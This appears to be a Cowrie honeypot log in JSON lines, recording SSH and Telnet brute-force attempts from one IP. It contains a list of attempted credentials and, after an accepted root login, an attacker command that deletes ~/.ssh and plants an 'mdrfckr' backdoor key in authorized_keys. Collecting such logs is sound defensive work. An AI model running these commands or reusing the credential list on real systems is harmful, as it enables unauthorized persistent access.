{"eventid":"cowrie.login.failed","username":"dbsql","password":"dbsql","message":"login attempt [dbsql/dbsql] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:13.727051Z","src_ip":"212.227.235.229","session":"5454b51ba234"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:14.814501Z","src_ip":"212.227.235.229","session":"5454b51ba234"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:19.588590Z","src_ip":"212.227.235.229","session":"fd6f4c886ed9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64277,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f151a9ec8f0","protocol":"ssh","message":"New connection: 212.227.235.229:64277 (1.2.3.4:22) [session: 5f151a9ec8f0]","sensor":"my-vps","timestamp":"2025-09-09T05:58:24.296335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:24.297159Z","src_ip":"212.227.235.229","session":"5f151a9ec8f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:24.422124Z","src_ip":"212.227.235.229","session":"5f151a9ec8f0"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"Welcome1","message":"login attempt [raspberry/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:24.979741Z","src_ip":"212.227.235.229","session":"5f151a9ec8f0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:26.116603Z","src_ip":"212.227.235.229","session":"5f151a9ec8f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50716,"dst_ip":"1.2.3.4","dst_port":22,"session":"05903103a21a","protocol":"ssh","message":"New connection: 212.227.235.229:50716 (1.2.3.4:22) [session: 05903103a21a]","sensor":"my-vps","timestamp":"2025-09-09T05:58:38.089174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:38.091424Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:38.169981Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.login.success","username":"root","password":"Ff123456@","message":"login attempt [root/Ff123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:58:38.524651Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:58:38.742260Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:58:38.743111Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:58:38.744603Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:38.824198Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:58:38.999464Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:58:39.000178Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:58:39.081060Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:39.082033Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56470,"dst_ip":"1.2.3.4","dst_port":22,"session":"bafcb18079ec","protocol":"ssh","message":"New connection: 212.227.235.229:56470 (1.2.3.4:22) [session: bafcb18079ec]","sensor":"my-vps","timestamp":"2025-09-09T05:58:39.158693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:39.159525Z","src_ip":"212.227.235.229","session":"bafcb18079ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:39.237507Z","src_ip":"212.227.235.229","session":"bafcb18079ec"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:39.591887Z","src_ip":"212.227.235.229","session":"bafcb18079ec"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:40.672083Z","src_ip":"212.227.235.229","session":"bafcb18079ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56478,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fd8d650fefb","protocol":"ssh","message":"New connection: 212.227.235.229:56478 (1.2.3.4:22) [session: 2fd8d650fefb]","sensor":"my-vps","timestamp":"2025-09-09T05:58:40.750240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:40.751586Z","src_ip":"212.227.235.229","session":"2fd8d650fefb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:40.830154Z","src_ip":"212.227.235.229","session":"2fd8d650fefb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:58:41.184170Z","src_ip":"212.227.235.229","session":"2fd8d650fefb"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:41.263898Z","src_ip":"212.227.235.229","session":"05903103a21a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:41.264964Z","src_ip":"212.227.235.229","session":"2fd8d650fefb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38180,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c7a6c312c83","protocol":"ssh","message":"New connection: 212.227.235.229:38180 (1.2.3.4:22) [session: 4c7a6c312c83]","sensor":"my-vps","timestamp":"2025-09-09T05:58:46.873224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:58:46.881754Z","src_ip":"212.227.235.229","session":"4c7a6c312c83"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:58:47.056280Z","src_ip":"212.227.235.229","session":"4c7a6c312c83"}
{"eventid":"cowrie.login.failed","username":"tester","password":"tester@123","message":"login attempt [tester/tester@123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:47.768960Z","src_ip":"212.227.235.229","session":"4c7a6c312c83"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:48.956369Z","src_ip":"212.227.235.229","session":"4c7a6c312c83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33602,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fcc1fce6da5","protocol":"ssh","message":"New connection: 212.227.235.229:33602 (1.2.3.4:22) [session: 7fcc1fce6da5]","sensor":"my-vps","timestamp":"2025-09-09T05:58:54.943746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:54.950326Z","src_ip":"212.227.235.229","session":"7fcc1fce6da5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:55.120895Z","src_ip":"212.227.235.229","session":"7fcc1fce6da5"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password123","message":"login attempt [deployer/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:56.381456Z","src_ip":"212.227.235.229","session":"7fcc1fce6da5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":4166,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc380bd50300","protocol":"telnet","message":"New connection: 212.227.235.229:4166 (1.2.3.4:23) [session: bc380bd50300]","sensor":"my-vps","timestamp":"2025-09-09T05:58:56.956472Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:57.555361Z","src_ip":"212.227.235.229","session":"7fcc1fce6da5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41694,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbf23e65e1b4","protocol":"ssh","message":"New connection: 212.227.235.229:41694 (1.2.3.4:22) [session: dbf23e65e1b4]","sensor":"my-vps","timestamp":"2025-09-09T05:59:05.320036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:59:05.320793Z","src_ip":"212.227.235.229","session":"dbf23e65e1b4"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:59:05.561275Z","src_ip":"212.227.235.229","session":"dbf23e65e1b4"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"minecraft","message":"login attempt [minecraft/minecraft] failed","sensor":"my-vps","timestamp":"2025-09-09T05:59:06.562551Z","src_ip":"212.227.235.229","session":"dbf23e65e1b4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:59:07.805866Z","src_ip":"212.227.235.229","session":"dbf23e65e1b4"}
{"eventid":"cowrie.session.closed","duration":13.78500509262085,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:59:10.741419Z","src_ip":"212.227.235.229","session":"bc380bd50300"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64843,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ffed0853b6","protocol":"ssh","message":"New connection: 212.227.235.229:64843 (1.2.3.4:22) [session: f1ffed0853b6]","sensor":"my-vps","timestamp":"2025-09-09T05:59:18.799518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:59:18.815164Z","src_ip":"212.227.235.229","session":"f1ffed0853b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:59:18.949342Z","src_ip":"212.227.235.229","session":"f1ffed0853b6"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"changeme","message":"login attempt [weblogic/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T05:59:19.472733Z","src_ip":"212.227.235.229","session":"f1ffed0853b6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:59:20.600449Z","src_ip":"212.227.235.229","session":"f1ffed0853b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57194,"dst_ip":"1.2.3.4","dst_port":22,"session":"527ba3148759","protocol":"ssh","message":"New connection: 212.227.235.229:57194 (1.2.3.4:22) [session: 527ba3148759]","sensor":"my-vps","timestamp":"2025-09-09T05:59:41.628154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:59:41.628853Z","src_ip":"212.227.235.229","session":"527ba3148759"}
